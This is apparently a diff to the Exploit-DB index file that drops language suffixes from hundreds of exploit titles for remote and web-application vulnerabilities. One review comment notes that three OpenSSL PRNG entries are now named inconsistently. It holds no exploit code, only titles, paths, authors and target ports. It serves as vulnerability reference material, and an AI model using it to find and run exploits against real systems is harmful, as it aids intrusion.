 3380,exploits/windows/remote/3380.txt,"Kiwi CatTools TFTP 3.2.8 - Directory Traversal",2007-02-27,"Sergey Gordeychik",remote,windows,
 3381,exploits/windows/remote/3381.pl,"NetProxy 4.03 - Web Filter Evasion / Bypass Logging",2007-02-27,"Craig Heffner",remote,windows,
-3388,exploits/windows/remote/3388.pl,"3Com TFTP Service (3CTftpSvc) 2.0.1 - Long Transporting Mode (Perl)",2007-02-28,"Umesh Wanve",remote,windows,69
+3388,exploits/windows/remote/3388.pl,"3Com TFTP Service (3CTftpSvc) 2.0.1 - Long Transporting Mode",2007-02-28,"Umesh Wanve",remote,windows,69
 3389,exploits/linux/remote/3389.c,"Madwifi 0.9.2.1 - WPA/RSN IE Remote Kernel Buffer Overflow",2007-03-01,"Massimiliano Oldani",remote,linux,
 3391,exploits/windows/remote/3391.py,"Snort 2.6.1 - DCE/RPC Preprocessor Remote Buffer Overflow",2007-03-01,"Trirat Puttaraksa",remote,windows,
 3395,exploits/windows/remote/3395.c,"WebMod 0.48 - Content-Length Remote Buffer Overflow",2007-03-01,cybermind,remote,windows,
@@ -11866,8 +11866,8 @@ id,file,description,date,author,type,platform,port
 3452,exploits/multiple/remote/3452.php,"PHP 5.2.0 - EXT/Filter FDF Post Filter Bypass",2007-03-10,"Stefan Esser",remote,multiple,
 3462,exploits/windows/remote/3462.cpp,"NewsReactor 20070220 - Article Grabbing Remote Buffer Overflow (1)",2007-03-12,Marsu,remote,windows,
 3463,exploits/windows/remote/3463.cpp,"NewsReactor 20070220 - Article Grabbing Remote Buffer Overflow (2)",2007-03-12,Marsu,remote,windows,
-3474,exploits/windows/remote/3474.py,"WarFTP 1.65 (Windows 2000 SP4) - 'USER' Remote Buffer Overflow (Python)",2007-03-14,"Winny Thomas",remote,windows,21
-3482,exploits/windows/remote/3482.pl,"WarFTP 1.65 (Windows 2000 SP4) - 'USER' Remote Buffer Overflow (Perl)",2007-03-15,"Umesh Wanve",remote,windows,21
+3474,exploits/windows/remote/3474.py,"WarFTP 1.65 (Windows 2000 SP4) - 'USER' Remote Buffer Overflow",2007-03-14,"Winny Thomas",remote,windows,21
+3482,exploits/windows/remote/3482.pl,"WarFTP 1.65 (Windows 2000 SP4) - 'USER' Remote Buffer Overflow",2007-03-15,"Umesh Wanve",remote,windows,21
 3491,exploits/bsd/remote/3491.py,"OpenBSD - ICMPv6 Fragment Remote Execution",2007-03-15,"Core Security",remote,bsd,
 3495,exploits/windows/remote/3495.txt,"CA BrightStor ARCserve - 'msgeng.exe' Remote Stack Overflow",2007-03-16,"Winny Thomas",remote,windows,6503
 3531,exploits/windows/remote/3531.py,"Helix Server 11.0.1 (Windows 2000 SP4) - Remote Heap Overflow",2007-03-21,"Winny Thomas",remote,windows,554
@@ -12091,7 +12091,7 @@ id,file,description,date,author,type,platform,port
 4745,exploits/windows/remote/4745.cpp,"Microsoft Windows Message Queuing Service - RPC Buffer Overflow (MS07-065) (1)",2007-12-18,axis,remote,windows,
 4746,exploits/windows/remote/4746.html,"RavWare Software - '.MAS' Flic Control Remote Buffer Overflow",2007-12-18,shinnai,remote,windows,
 4747,exploits/windows/remote/4747.vbs,"RaidenHTTPD 2.0.19 - 'ulang' Remote Command Execution",2007-12-18,rgod,remote,windows,
-4754,exploits/windows_x86/remote/4754.pl,"3proxy 0.5.3g (Windows x86) - 'logurl()' Remote Buffer Overflow (Perl)",2007-12-18,"Marcin Kozlowski",remote,windows_x86,3128
+4754,exploits/windows_x86/remote/4754.pl,"3proxy 0.5.3g (Windows x86) - 'logurl()' Remote Buffer Overflow",2007-12-18,"Marcin Kozlowski",remote,windows_x86,3128
 4760,exploits/windows/remote/4760.txt,"Microsoft Windows Server 2000 SP4 (Advanced Server) - Message Queue (MS07-065)",2007-12-21,"Andres Tarasco",remote,windows,
 4761,exploits/multiple/remote/4761.pl,"Sendmail with clamav-milter < 0.91.2 - Remote Command Execution",2007-12-21,eliteboy,remote,multiple,25
 4784,exploits/windows/remote/4784.pl,"BadBlue 2.72 - PassThru Remote Buffer Overflow",2007-12-24,"Jacopo Cervini",remote,windows,80
@@ -12198,12 +12198,12 @@ id,file,description,date,author,type,platform,port
 5563,exploits/windows/remote/5563.pl,"TFTP Server for Windows 1.4 - ST Remote BSS Overflow",2008-05-08,tixxDZ,remote,windows,69
 5612,exploits/windows/remote/5612.html,"idautomation bar code - ActiveX Multiple Vulnerabilities",2008-05-14,shinnai,remote,windows,
 5619,exploits/windows/remote/5619.html,"Microsoft Internet Explorer - Print Table of Links Cross-Zone Scripting",2008-05-14,"Aviv Raff",remote,windows,
-5622,exploits/linux/remote/5622.txt,"OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH (Perl)",2008-05-15,"Markus Mueller",remote,linux,22
+5622,exploits/linux/remote/5622.txt,"OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH",2008-05-15,"Markus Mueller",remote,linux,22
 5632,exploits/linux/remote/5632.rb,"OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH (Ruby)",2008-05-16,L4teral,remote,linux,22
 5681,exploits/windows/remote/5681.html,"Creative Software AutoUpdate Engine - ActiveX Stack Overflow",2008-05-27,BitKrush,remote,windows,
 5694,exploits/windows/remote/5694.cpp,"ASUS DPC Proxy 2.0.0.16/19 - Remote Buffer Overflow",2008-05-29,Heretic2,remote,windows,623
 5695,exploits/windows/remote/5695.cpp,"Now SMS/Mms Gateway 5.5 - Remote Buffer Overflow",2008-05-29,Heretic2,remote,windows,8800
-5720,exploits/linux/remote/5720.py,"OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH (Python)",2008-06-01,"WarCat team",remote,linux,22
+5720,exploits/linux/remote/5720.py,"OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH",2008-06-01,"WarCat team",remote,linux,22
 5732,exploits/windows/remote/5732.html,"C6 Messenger - ActiveX Remote Download and Execute",2008-06-03,Nine:Situations:Group,remote,windows,
 5738,exploits/windows/remote/5738.rb,"HP StorageWorks - NSI Double Take Remote Overflow (Metasploit)",2008-06-04,ri0t,remote,windows,1100
 5741,exploits/windows/remote/5741.html,"Akamai Download Manager < 2.2.3.7 - ActiveX Remote Download",2008-06-04,cocoruder,remote,windows,
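Review bot: Row 5632 still ends in `(Ruby)` while rows 5622 and 5720 in this hunk lose `(Perl)` and `(Python)`, so three entries for the same issue are now named by two different conventions. If the intent is to drop language suffixes throughout, the description for 5632 should become `"OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH"`. If the suffix is kept there on purpose to tell the variants apart, then 5622 and 5720 need an equivalent distinguishing tag, since they are otherwise identical in title.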
@@ -12221,15 +12221,15 @@ id,file,description,date,author,type,platform,port
 6004,exploits/windows/remote/6004.txt,"Panda Security ActiveScan 2.0 (Update) - Remote Buffer Overflow",2008-07-04,"Karol Wiesek",remote,windows,
 6012,exploits/windows/remote/6012.php,"Youngzsoft CMailServer 5.4.6 - 'CMailCOM.dll' Remote Overwrite (SEH)",2008-07-06,Nine:Situations:Group,remote,windows,80
 6013,exploits/osx/remote/6013.pl,"Apple Safari / QuickTime 7.3 - RTSP Content-Type Remote Buffer Overflow",2008-07-06,krafty,remote,osx,
-6045,exploits/linux/remote/6045.py,"Fonality trixbox 2.6.1 - 'langChoice' Remote Code Execution (Python)",2008-07-12,muts,remote,linux,80
+6045,exploits/linux/remote/6045.py,"Fonality trixbox 2.6.1 - 'langChoice' Remote Code Execution",2008-07-12,muts,remote,linux,80
 6089,exploits/windows/remote/6089.pl,"Bea Weblogic Apache Connector - Code Execution / Denial of Service",2008-07-17,kingcope,remote,windows,80
 6094,exploits/linux/remote/6094.txt,"Debian OpenSSH - (Authenticated) Remote SELinux Privilege Escalation",2008-07-17,eliteboy,remote,linux,
 6100,exploits/windows_x86/remote/6100.py,"Apache mod_jk 1.2.19 (Windows x86) - Remote Buffer Overflow",2008-07-18,Unohope,remote,windows_x86,80
 6116,exploits/windows/remote/6116.pl,"IntelliTamper 2.0.7 - HTML Parser Remote Buffer Overflow",2008-07-22,"Guido Landi",remote,windows,
 6118,exploits/windows/remote/6118.pl,"IntelliTamper 2.07 - server header Remote Code Execution",2008-07-22,Koshi,remote,windows,
-6121,exploits/windows/remote/6121.c,"IntelliTamper 2.0.7 - HTML Parser Remote Buffer Overflow (C)",2008-07-23,r0ut3r,remote,windows,
+6121,exploits/windows/remote/6121.c,"IntelliTamper 2.0.7 - HTML Parser Remote Buffer Overflow",2008-07-23,r0ut3r,remote,windows,
 6122,exploits/multiple/remote/6122.rb,"BIND 9.4.1 < 9.4.2 - Remote DNS Cache Poisoning (Metasploit)",2008-07-23,I)ruid,remote,multiple,
-6123,exploits/multiple/remote/6123.py,"BIND 9.x - Remote DNS Cache Poisoning (Python)",2008-07-24,"Julien Desfossez",remote,multiple,
+6123,exploits/multiple/remote/6123.py,"BIND 9.x - Remote DNS Cache Poisoning",2008-07-24,"Julien Desfossez",remote,multiple,
 6124,exploits/windows/remote/6124.c,"Microsoft Access - 'Snapview.ocx 10.0.5529.0' ActiveX Remote File Download",2008-07-24,callAX,remote,windows,
 6130,exploits/multiple/remote/6130.c,"BIND 9.x - Remote DNS Cache Poisoning",2008-07-25,"Marc Bevand",remote,multiple,
 6151,exploits/windows/remote/6151.txt,"Velocity Web-Server 1.0 - Directory Traversal",2008-07-28,DSecRG,remote,windows,
@@ -12376,7 +12376,7 @@ id,file,description,date,author,type,platform,port
 8041,exploits/windows/remote/8041.txt,"GeoVision Digital Video Surveillance System 8.2 - Arbitrary File Disclosure",2009-02-11,"Dejan Levaja",remote,windows,
 8059,exploits/windows/remote/8059.html,"GeoVision LiveX 8200 - ActiveX 'LIVEX_~1.OCX' File Corruption",2009-02-16,Nine:Situations:Group,remote,windows,
 8079,exploits/windows/remote/8079.html,"Microsoft Internet Explorer 7 (Windows XP SP2) - Memory Corruption (MS09-002)",2009-02-20,Abysssec,remote,windows,
-8080,exploits/windows/remote/8080.py,"Microsoft Internet Explorer 7 - Memory Corruption (MS09-002) (Python)",2009-02-20,"David Kennedy (ReL1K)",remote,windows,
+8080,exploits/windows/remote/8080.py,"Microsoft Internet Explorer 7 - Memory Corruption (MS09-002)",2009-02-20,"David Kennedy (ReL1K)",remote,windows,
 8082,exploits/windows/remote/8082.html,"Microsoft Internet Explorer 7 (Windows 2003 SP2) - Memory Corruption (MS09-002)",2009-02-20,webDEViL,remote,windows,
 8096,exploits/hardware/remote/8096.txt,"Optus/Huawei E960 HSDPA Router - Sms Cross-Site Scripting",2009-02-23,"Rizki Wicaksono",remote,hardware,
 8097,exploits/multiple/remote/8097.txt,"MLdonkey 2.9.7 - Arbitrary File Disclosure",2009-02-23,"Michael Peselnik",remote,multiple,
@@ -12387,7 +12387,7 @@ id,file,description,date,author,type,platform,port
 8144,exploits/windows/remote/8144.txt,"Imera ImeraIEPlugin - ActiveX Control Remote Code Execution",2009-03-03,Elazar,remote,windows,
 8149,exploits/windows/remote/8149.txt,"EFS Easy Chat Server 2.2 - Cross-Site Request Forgery (Change Admin Password)",2009-03-03,Stack,remote,windows,
 8152,exploits/windows/remote/8152.py,"Microsoft Internet Explorer 7 - Memory Corruption (MS09-002)",2009-03-04,"Ahmed Obied",remote,windows,
-8154,exploits/windows/remote/8154.pl,"EFS Easy Chat Server 2.2 - Authentication Request Buffer Overflow (Perl)",2009-03-04,Dr4sH,remote,windows,80
+8154,exploits/windows/remote/8154.pl,"EFS Easy Chat Server 2.2 - Authentication Request Buffer Overflow",2009-03-04,Dr4sH,remote,windows,80
 8155,exploits/windows/remote/8155.txt,"Easy File Sharing Web Server 4.8 - File Disclosure",2009-03-04,Stack,remote,windows,
 8160,exploits/windows/remote/8160.html,"SupportSoft DNA Editor Module - 'dnaedit.dll' Code Execution",2009-03-05,Nine:Situations:Group,remote,windows,
 8173,exploits/windows/remote/8173.txt,"Belkin BullDog Plus - UPS-Service Buffer Overflow",2009-03-09,Elazar,remote,windows,
@@ -12456,7 +12456,7 @@ id,file,description,date,author,type,platform,port
 8754,exploits/windows/remote/8754.patch,"Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (Patch)",2009-05-21,"Ron Bowes/Andrew Orr",remote,windows,
 8757,exploits/windows/remote/8757.html,"BaoFeng - 'config.dll' ActiveX Remote Code Execution",2009-05-21,etirah,remote,windows,
 8758,exploits/windows/remote/8758.html,"ChinaGames - 'CGAgent.dll' ActiveX Remote Code Execution",2009-05-21,etirah,remote,windows,
-8765,exploits/windows/remote/8765.php,"Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (PHP)",2009-05-22,racle,remote,windows,
+8765,exploits/windows/remote/8765.php,"Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass",2009-05-22,racle,remote,windows,
 8786,exploits/multiple/remote/8786.txt,"Lighttpd < 1.4.23 (BSD/Solaris) - Source Code Disclosure",2009-05-26,venatir,remote,multiple,
 8804,exploits/windows/remote/8804.py,"Soulseek 157 NS - Remote Buffer Overflow (SEH)",2009-05-26,His0k4,remote,windows,2242
 8806,exploits/windows/remote/8806.pl,"Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (2)",2009-05-26,ka0x,remote,windows,
@@ -12662,7 +12662,7 @@ id,file,description,date,author,type,platform,port
 10973,exploits/windows/remote/10973.py,"BigAnt Server 2.52 - Remote Buffer Overflow (2)",2010-01-03,DouBle_Zer0,remote,windows,
 10980,exploits/linux/remote/10980.txt,"Skype for Linux 2.1 Beta - Multiple Strange Behaviour Vulnerabilities",2010-01-04,emgent,remote,linux,
 11022,exploits/novell/remote/11022.pl,"Novell eDirectory 8.8 SP5 - (Authenticated) Remote Buffer Overflow",2010-01-06,"His0k4 & Simo36",remote,novell,
-11027,exploits/windows/remote/11027.pl,"Apple QuickTime 7.2/7.3 - RTSP Buffer Overflow (Perl)",2010-01-06,jacky,remote,windows,
+11027,exploits/windows/remote/11027.pl,"Apple QuickTime 7.2/7.3 - RTSP Buffer Overflow",2010-01-06,jacky,remote,windows,
 11059,exploits/windows/remote/11059.html,"JcomBand toolbar on IE - ActiveX Buffer Overflow",2010-01-07,"germaya_x & D3V!L FUCKER",remote,windows,
 11138,exploits/windows/remote/11138.c,"Apple iTunes 8.1.x - 'daap' Remote Buffer Overflow",2010-01-14,Simo36,remote,windows,
 11151,exploits/windows/remote/11151.html,"Microsoft Internet Explorer - 'wshom.ocx' ActiveX Control Remote Code Execution",2010-01-16,"germaya_x & D3V!L FUCKER",remote,windows,
@@ -17268,7 +17268,7 @@ id,file,description,date,author,type,platform,port
 37400,exploits/windows/remote/37400.php,"Havij - OLE Automation Array Remote Code Execution",2015-06-27,"Mohammad Reza Espargham",remote,windows,
 37429,exploits/hardware/remote/37429.txt,"Juniper Networks Mobility System Software - '/aaa/wba_login.html' Cross-Site Scripting",2012-06-14,"Craig Lambert",remote,hardware,
 37405,exploits/hardware/remote/37405.py,"Edimax IC-3030iWn - UDP Packet Password Information Disclosure",2012-06-14,y3dips,remote,hardware,
-37426,exploits/cgi/remote/37426.py,"Endian Firewall < 3.0.0 - OS Command Injection (Python)",2015-06-29,"Ben Lincoln",remote,cgi,
+37426,exploits/cgi/remote/37426.py,"Endian Firewall < 3.0.0 - OS Command Injection",2015-06-29,"Ben Lincoln",remote,cgi,
 37428,exploits/cgi/remote/37428.txt,"Endian Firewall < 3.0.0 - OS Command Injection (Metasploit)",2015-06-29,"Ben Lincoln",remote,cgi,
 37564,exploits/hardware/remote/37564.txt,"Barracuda Email Security Service - Multiple HTML Injection Vulnerabilities",2012-08-02,"Benjamin Kunz Mejri",remote,hardware,
 37448,exploits/multiple/remote/37448.rb,"Adobe Flash Player - Drawing Fill Shader Memory Corruption (Metasploit)",2015-06-30,Metasploit,remote,multiple,
@@ -18402,8 +18402,8 @@ id,file,description,date,author,type,platform,port
 737,exploits/php/webapps/737.txt,"QwikiWiki - Directory Traversal",2005-01-04,Madelman,webapps,php,
 740,exploits/php/webapps/740.pl,"phpBB 2.0.10 - 'ssh.D.Worm' Bot Install Altavista",2005-01-04,"Severino Honorato",webapps,php,
 754,exploits/php/webapps/754.pl,"ITA Forum 1.49 - SQL Injection",2005-01-13,RusH,webapps,php,
-772,exploits/cgi/webapps/772.c,"AWStats 6.0 < 6.2 - 'configdir' Remote Command Execution (C)",2005-01-25,THUNDER,webapps,cgi,
-773,exploits/cgi/webapps/773.pl,"AWStats 6.0 < 6.2 - 'configdir' Remote Command Execution (Perl)",2005-01-25,GHC,webapps,cgi,
+772,exploits/cgi/webapps/772.c,"AWStats 6.0 < 6.2 - 'configdir' Remote Command Execution",2005-01-25,THUNDER,webapps,cgi,
+773,exploits/cgi/webapps/773.pl,"AWStats 6.0 < 6.2 - 'configdir' Remote Command Execution",2005-01-25,GHC,webapps,cgi,
 774,exploits/php/webapps/774.pl,"Siteman 1.1.10 - Remote Administrative Account Addition",2005-01-25,"Noam Rathaus",webapps,php,
 786,exploits/php/webapps/786.pl,"LiteForum 2.1.1 - SQL Injection",2005-02-04,RusH,webapps,php,
 790,exploits/cgi/webapps/790.pl,"PerlDesk 1.x - SQL Injection",2005-02-05,deluxe89,webapps,cgi,
@@ -18432,7 +18432,7 @@ id,file,description,date,author,type,platform,port
 881,exploits/php/webapps/881.txt,"ZPanel 2.5 - SQL Injection",2005-03-15,Mikhail,webapps,php,
 889,exploits/php/webapps/889.pl,"phpBB 2.0.12 - Change User Rights Authentication Bypass",2005-03-21,Kutas,webapps,php,
 892,exploits/php/webapps/892.txt,"phpMyFamily 1.4.0 - Authentication Bypass",2005-03-21,kre0n,webapps,php,
-897,exploits/php/webapps/897.cpp,"phpBB 2.0.12 - Change User Rights Authentication Bypass (C)",2005-03-24,str0ke,webapps,php,
+897,exploits/php/webapps/897.cpp,"phpBB 2.0.12 - Change User Rights Authentication Bypass",2005-03-24,str0ke,webapps,php,
 901,exploits/php/webapps/901.pl,"PunBB 1.2.2 - Authentication Bypass",2005-03-29,RusH,webapps,php,
 907,exploits/php/webapps/907.pl,"phpBB 2.0.13 - 'downloads.php' mod Get Hash",2005-04-02,CereBrums,webapps,php,
 910,exploits/php/webapps/910.pl,"phpBB 2.0.13 - 'Calendar Pro' mod Get Hash",2005-04-04,CereBrums,webapps,php,
@@ -18452,13 +18452,13 @@ id,file,description,date,author,type,platform,port
 1004,exploits/cgi/webapps/1004.php,"WebAPP 0.9.9.2.1 - Remote Command Execution (2)",2005-05-20,Nikyt0x,webapps,cgi,
 1005,exploits/cgi/webapps/1005.pl,"WebAPP 0.9.9.2.1 - Remote Command Execution (1)",2005-05-20,Alpha_Programmer,webapps,cgi,
 1006,exploits/php/webapps/1006.pl,"Woltlab Burning Board 2.3.1 - 'register.php' SQL Injection",2005-05-20,deluxe89,webapps,php,
-1010,exploits/asp/webapps/1010.pl,"Maxwebportal 1.36 - 'Password.asp' Change Password (3) (Perl)",2005-05-26,Alpha_Programmer,webapps,asp,
-1011,exploits/asp/webapps/1011.php,"Maxwebportal 1.36 - 'Password.asp' Change Password (2) (PHP)",2005-05-26,mh_p0rtal,webapps,asp,
+1010,exploits/asp/webapps/1010.pl,"Maxwebportal 1.36 - 'Password.asp' Change Password (3)",2005-05-26,Alpha_Programmer,webapps,asp,
+1011,exploits/asp/webapps/1011.php,"Maxwebportal 1.36 - 'Password.asp' Change Password (2)",2005-05-26,mh_p0rtal,webapps,asp,
 1012,exploits/asp/webapps/1012.txt,"Maxwebportal 1.36 - 'Password.asp' Change Password (1) (HTML)",2005-05-26,"Soroush Dalili",webapps,asp,
 1013,exploits/php/webapps/1013.pl,"Invision Power Board 2.0.3 - 'login.php' SQL Injection",2005-05-26,"Petey Beege",webapps,php,
 1014,exploits/php/webapps/1014.txt,"Invision Power Board 2.0.3 - 'login.php' SQL Injection (Tutorial)",2005-05-27,"Danica Jones",webapps,php,
 1015,exploits/asp/webapps/1015.txt,"Hosting Controller 0.6.1 - User Registration (3)",2005-05-27,"Soroush Dalili",webapps,asp,
-1016,exploits/php/webapps/1016.pl,"phpStat 1.5 - 'setup.php' Authentication Bypass (Perl)",2005-05-30,Alpha_Programmer,webapps,php,
+1016,exploits/php/webapps/1016.pl,"phpStat 1.5 - 'setup.php' Authentication Bypass",2005-05-30,Alpha_Programmer,webapps,php,
 1017,exploits/php/webapps/1017.php,"phpStat 1.5 - 'setup.php' Authentication Bypass (PHP) (1)",2005-05-30,mh_p0rtal,webapps,php,
 1018,exploits/php/webapps/1018.php,"phpStat 1.5 - 'setup.php' Authentication Bypass (PHP) (2)",2005-05-30,Nikyt0x,webapps,php,
 1020,exploits/php/webapps/1020.c,"ZeroBoard 4.1 - 'preg_replace' Remote Nobody Shell",2005-05-31,n0gada,webapps,php,
@@ -18558,7 +18558,7 @@ id,file,description,date,author,type,platform,port
 1356,exploits/php/webapps/1356.php,"DoceboLms 2.0.4 - 'connector.php' Arbitrary File Upload",2005-12-04,rgod,webapps,php,
 1358,exploits/php/webapps/1358.php,"SimpleBBS 1.1 - Remote Command Execution",2005-12-06,rgod,webapps,php,
 1359,exploits/php/webapps/1359.php,"SugarSuite Open Source 4.0beta - Remote Code Execution (1)",2005-12-07,rgod,webapps,php,
-1361,exploits/php/webapps/1361.c,"SimpleBBS 1.1 - Remote Command Execution (C)",2005-12-07,unitedasia,webapps,php,
+1361,exploits/php/webapps/1361.c,"SimpleBBS 1.1 - Remote Command Execution",2005-12-07,unitedasia,webapps,php,
 1363,exploits/php/webapps/1363.php,"Website Baker 2.6.0 - Authentication Bypass / Remote Code Execution",2005-12-08,rgod,webapps,php,
 1364,exploits/php/webapps/1364.c,"SugarSuite Open Source 4.0beta - Remote Code Execution (2)",2005-12-08,pointslash,webapps,php,
 1367,exploits/php/webapps/1367.php,"Flatnuke 2.5.6 - Privilege Escalation / Remote Command Execution",2005-12-10,rgod,webapps,php,
@@ -18875,8 +18875,8 @@ id,file,description,date,author,type,platform,port
 1933,exploits/php/webapps/1933.txt,"BandSite CMS 1.1.1 - 'ROOT_PATH' Remote File Inclusion",2006-06-20,Kw3[R]Ln,webapps,php,
 1934,exploits/php/webapps/1934.txt,"dotProject 2.0.3 - 'baseDir' Remote File Inclusion",2006-06-20,h4ntu,webapps,php,
 1936,exploits/php/webapps/1936.txt,"SmartSite CMS 1.0 - 'root' Remote File Inclusion",2006-06-20,Archit3ct,webapps,php,
-1938,exploits/php/webapps/1938.pl,"DataLife Engine 4.1 - SQL Injection (Perl)",2006-06-21,RusH,webapps,php,
-1939,exploits/php/webapps/1939.php,"DataLife Engine 4.1 - SQL Injection (PHP)",2006-06-21,RusH,webapps,php,
+1938,exploits/php/webapps/1938.pl,"DataLife Engine 4.1 - SQL Injection",2006-06-21,RusH,webapps,php,
+1939,exploits/php/webapps/1939.php,"DataLife Engine 4.1 - SQL Injection",2006-06-21,RusH,webapps,php,
 1941,exploits/php/webapps/1941.php,"Mambo 4.6rc1 - Weblinks Blind SQL Injection (2)",2006-06-22,rgod,webapps,php,
 1942,exploits/php/webapps/1942.txt,"ralf image Gallery 0.7.4 - Multiple Vulnerabilities",2006-06-22,Aesthetico,webapps,php,
 1943,exploits/php/webapps/1943.txt,"Harpia CMS 1.0.5 - Remote File Inclusion",2006-06-22,Kw3[R]Ln,webapps,php,
@@ -19331,7 +19331,7 @@ id,file,description,date,author,type,platform,port
 2551,exploits/php/webapps/2551.txt,"phpBB ACP User Registration Mod 1.0 - Remote File Inclusion",2006-10-13,bd0rk,webapps,php,
 2552,exploits/php/webapps/2552.pl,"phpBB Security 1.0.1 - 'PHP_security.php' Remote File Inclusion",2006-10-13,"Nima Salehi",webapps,php,
 2553,exploits/php/webapps/2553.txt,"YaBBSM 3.0.0 - 'Offline.php' Remote File Inclusion",2006-10-13,SilenZ,webapps,php,
-2554,exploits/php/webapps/2554.php,"cPanel 10.8.x - 'cpwrap' via MySQLAdmin Privilege Escalation (PHP)",2006-10-13,"Nima Salehi",webapps,php,
+2554,exploits/php/webapps/2554.php,"cPanel 10.8.x - 'cpwrap' via MySQLAdmin Privilege Escalation",2006-10-13,"Nima Salehi",webapps,php,
 2555,exploits/php/webapps/2555.txt,"CentiPaid 1.4.2 - 'centipaid_class.php' Remote File Inclusion",2006-10-14,Kw3[R]Ln,webapps,php,
 2556,exploits/php/webapps/2556.txt,"E-Uploader Pro 1.0 - Image Upload / Code Execution",2006-10-14,Kacper,webapps,php,
 2557,exploits/php/webapps/2557.txt,"IncCMS Core 1.0.0 - 'settings.php' Remote File Inclusion",2006-10-14,Kacper,webapps,php,
@@ -21734,8 +21734,8 @@ id,file,description,date,author,type,platform,port
 6049,exploits/php/webapps/6049.txt,"Maian Gallery 2.0 - Insecure Cookie Handling",2008-07-12,Saime,webapps,php,
 6050,exploits/php/webapps/6050.txt,"Maian Greetings 2.1 - Insecure Cookie Handling",2008-07-12,Saime,webapps,php,
 6051,exploits/php/webapps/6051.txt,"Maian Music 1.0 - Insecure Cookie Handling",2008-07-12,Saime,webapps,php,
-6053,exploits/php/webapps/6053.php,"Fuzzylime CMS 3.01 - 'poll' Remote Code Execution (PHP)",2008-07-12,"Inphex & real",webapps,php,
-6054,exploits/php/webapps/6054.pl,"Fuzzylime CMS 3.01 - 'poll' Remote Code Execution (Perl)",2008-07-12,"Inphex & real",webapps,php,
+6053,exploits/php/webapps/6053.php,"Fuzzylime CMS 3.01 - 'poll' Remote Code Execution",2008-07-12,"Inphex & real",webapps,php,
+6054,exploits/php/webapps/6054.pl,"Fuzzylime CMS 3.01 - 'poll' Remote Code Execution",2008-07-12,"Inphex & real",webapps,php,
 6055,exploits/php/webapps/6055.pl,"Joomla! Component n-forms 1.01 - Blind SQL Injection",2008-07-12,"The Moorish",webapps,php,
 6056,exploits/php/webapps/6056.txt,"WebCMS Portal Edition - 'id' SQL Injection",2008-07-12,Mr.SQL,webapps,php,
 6057,exploits/php/webapps/6057.txt,"jsite 1.0 oe - SQL Injection / Local File Inclusion",2008-07-12,S.W.A.T.,webapps,php,
@@ -23482,7 +23482,7 @@ id,file,description,date,author,type,platform,port
 8555,exploits/php/webapps/8555.txt,"ABC Advertise 1.0 - Admin Password Disclosure",2009-04-27,SirGod,webapps,php,
 8557,exploits/php/webapps/8557.html,"VisionLms 1.0 - 'changePW.php' Remote Password Change",2009-04-28,Mr.tro0oqy,webapps,php,
 8558,exploits/php/webapps/8558.txt,"MIM: InfiniX 1.2.003 - Multiple SQL Injections",2009-04-28,YEnH4ckEr,webapps,php,
-8559,exploits/php/webapps/8559.c,"webSPELL 4.2.0d (Linux) - Local File Disclosure (C)",2009-04-28,StAkeR,webapps,php,
+8559,exploits/php/webapps/8559.c,"webSPELL 4.2.0d (Linux) - Local File Disclosure",2009-04-28,StAkeR,webapps,php,
 8563,exploits/php/webapps/8563.txt,"eLitius 1.0 - 'banner-details.php?id' SQL Injection",2009-04-29,snakespc,webapps,php,
 8565,exploits/php/webapps/8565.txt,"ProjectCMS 1.0b - 'index.php?sn' SQL Injection",2009-04-29,YEnH4ckEr,webapps,php,
 8566,exploits/php/webapps/8566.txt,"S-CMS 1.1 Stable - 'page' Local File Inclusion",2009-04-29,ZoRLu,webapps,php,
@@ -36088,7 +36088,7 @@ id,file,description,date,author,type,platform,port
 34518,exploits/jsp/webapps/34518.txt,"ManageEngine Desktop Central - Arbitrary File Upload / Remote Code Execution",2014-09-01,"Pedro Ribeiro",webapps,jsp,
 34519,exploits/jsp/webapps/34519.txt,"ManageEngine EventLog Analyzer - Multiple Vulnerabilities (1)",2014-09-01,"Hans-Martin Muench",webapps,jsp,8400
 34524,exploits/php/webapps/34524.txt,"WordPress Plugin Huge-IT Image Gallery 1.0.1 - (Authenticated) SQL Injection",2014-09-02,"Claudio Viviani",webapps,php,80
-34525,exploits/multiple/webapps/34525.txt,"Syslog LogAnalyzer 3.6.5 - Persistent Cross-Site Scripting (Python)",2014-09-02,"Dolev Farhi",webapps,multiple,
+34525,exploits/multiple/webapps/34525.txt,"Syslog LogAnalyzer 3.6.5 - Persistent Cross-Site Scripting",2014-09-02,"Dolev Farhi",webapps,multiple,
 34637,exploits/php/webapps/34637.txt,"Joomla! Component com_formmaker 3.4 - SQL Injection",2014-09-12,"Claudio Viviani",webapps,php,
 34684,exploits/php/webapps/34684.pl,"Joomla! Component com_spain - 'nv' SQL Injection",2010-09-20,FL0RiX,webapps,php,
 34531,exploits/php/webapps/34531.txt,"BlastChat Client 3.3 - Cross-Site Scripting",2010-08-25,"Aung Khant",webapps,php,
@@ -36206,7 +36206,7 @@ id,file,description,date,author,type,platform,port
 34678,exploits/php/webapps/34678.txt,"WebStatCaffe - '/stat/pageviewerschart.php?date' Cross-Site Scripting",2009-08-29,Moudi,webapps,php,
 34679,exploits/php/webapps/34679.txt,"WebStatCaffe - '/stat/referer.php?date' Cross-Site Scripting",2009-08-29,Moudi,webapps,php,
 34680,exploits/hardware/webapps/34680.txt,"ZTE ZXDSL-931VII - Configuration Dump",2014-09-16,"L0ukanik0-s S0kniaku0l",webapps,hardware,
-34681,exploits/php/webapps/34681.txt,"WordPress Plugin Slideshow Gallery 1.4.6 - Arbitrary File Upload (Python)",2014-09-16,"Claudio Viviani",webapps,php,
+34681,exploits/php/webapps/34681.txt,"WordPress Plugin Slideshow Gallery 1.4.6 - Arbitrary File Upload",2014-09-16,"Claudio Viviani",webapps,php,
 34682,exploits/ios/webapps/34682.txt,"USB&WiFi Flash Drive 1.3 iOS - Code Execution",2014-09-16,Vulnerability-Lab,webapps,ios,8080
